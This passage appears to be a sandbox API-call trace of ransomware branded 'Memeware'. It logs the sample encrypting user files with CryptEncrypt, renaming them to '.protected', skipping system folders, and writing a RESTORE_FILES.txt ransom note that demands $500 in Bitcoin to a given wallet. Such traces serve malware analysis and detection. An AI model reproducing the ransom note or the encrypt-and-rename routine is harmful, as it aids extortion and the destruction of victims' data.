lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.196] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.196] CloseHandle (hObject=0x150) returned 1 [0089.196] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.protected") returned 162 [0089.196] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1.protected")) returned 1 [0089.197] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.197] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="Windows") returned -1 [0089.197] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="Program Files") returned -1 [0089.197] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="Program Files (x86)") returned -1 [0089.197] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="$Recycle.bin") returned 1 [0089.197] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="System Volume Information") returned -1 [0089.197] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 119 [0089.197] StrStrIW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".protected") returned 0x0 [0089.197] lstrcmpW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="RESTORE_FILES.txt") returned -1 [0089.197] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.197] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.197] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 119 [0089.197] StrStrW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".txt") returned 0x0 [0089.198] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 119 [0089.198] StrStrW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".rar") returned 0x0 [0089.198] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 119 [0089.198] StrStrW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".zip") returned 0x0 [0089.198] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xfc, lpOverlapped=0x0) returned 1 [0089.198] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.198] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xfc, 
lpOverlapped=0x0) returned 1 [0089.198] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.198] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.198] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.198] CloseHandle (hObject=0x150) returned 1 [0089.199] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76.protected") returned 129 [0089.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\f90f18257cbb4d84216ac1e1f3bb2c76.protected")) returned 1 [0089.199] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.199] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.199] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\RESTORE_FILES.txt") returned 104 
[0089.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.199] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.200] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, 
lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.200] lstrlenA (lpString="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") returned 684 [0089.200] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.200] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.200] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.200] CloseHandle (hObject=0x14c) returned 1 [0089.201] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.201] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.201] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\RESTORE_FILES.txt") returned 95 [0089.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.202] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.202] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.202] lstrlenA (lpString="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") returned 684 [0089.202] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.202] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.202] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.203] CloseHandle (hObject=0xd8) returned 1 [0089.203] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.203] lstrcmpiW (lpString1="IME12", lpString2="Windows") returned -1 [0089.203] lstrcmpiW (lpString1="IME12", lpString2="Program Files") returned -1 [0089.203] lstrcmpiW (lpString1="IME12", lpString2="Program Files (x86)") returned -1 [0089.203] lstrcmpiW (lpString1="IME12", lpString2="$Recycle.bin") returned 1 [0089.203] lstrcmpiW (lpString1="IME12", lpString2="System Volume Information") returned -1 [0089.203] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12") returned 66 [0089.203] lstrcmpW (lpString1="IME12", lpString2=".") returned 1 [0089.203] lstrcmpW (lpString1="IME12", lpString2="..") returned 1 [0089.203] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*") returned 68 [0089.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.213] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.213] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.213] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.213] lstrcmpiW (lpString1=".", 
lpString2="$Recycle.bin") returned 1 [0089.213] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.213] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\.") returned 68 [0089.213] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.213] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.213] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.213] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.213] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.213] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.213] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.213] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\..") returned 69 [0089.214] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.214] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.214] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.214] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.214] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\RESTORE_FILES.txt") returned 84 [0089.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\ime12\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 
[0089.214] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.214] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.215] lstrlenA (lpString="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") returned 684 [0089.215] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, 
lpOverlapped=0x0) returned 1 [0089.215] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.215] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.215] CloseHandle (hObject=0xd8) returned 1 [0089.216] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.216] lstrcmpiW (lpString1="IMJP12", lpString2="Windows") returned -1 [0089.216] lstrcmpiW (lpString1="IMJP12", lpString2="Program Files") returned -1 [0089.216] lstrcmpiW (lpString1="IMJP12", lpString2="Program Files (x86)") returned -1 [0089.216] lstrcmpiW (lpString1="IMJP12", lpString2="$Recycle.bin") returned 1 [0089.216] lstrcmpiW (lpString1="IMJP12", lpString2="System Volume Information") returned -1 [0089.216] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12") returned 67 [0089.216] lstrcmpW (lpString1="IMJP12", lpString2=".") returned 1 [0089.216] lstrcmpW (lpString1="IMJP12", lpString2="..") returned 1 [0089.216] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*") returned 69 [0089.216] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.216] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.216] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.216] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") 
returned -1 [0089.216] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.216] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.216] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\.") returned 69 [0089.216] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.216] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.216] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.216] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.216] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.216] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.216] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.216] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\..") returned 70 [0089.216] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.216] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.216] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.216] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.216] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\RESTORE_FILES.txt") returned 85 [0089.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\imjp12\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.217] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.217] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.218] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.218] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.218] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.218] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.218] CloseHandle (hObject=0xd8) returned 1 [0089.218] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.218] lstrcmpiW (lpString1="IMJP8_1", lpString2="Windows") returned -1 [0089.218] lstrcmpiW (lpString1="IMJP8_1", lpString2="Program Files") returned -1 [0089.218] lstrcmpiW (lpString1="IMJP8_1", lpString2="Program Files (x86)") returned -1 [0089.218] lstrcmpiW (lpString1="IMJP8_1", lpString2="$Recycle.bin") returned 1 [0089.218] lstrcmpiW (lpString1="IMJP8_1", lpString2="System Volume Information") returned -1 
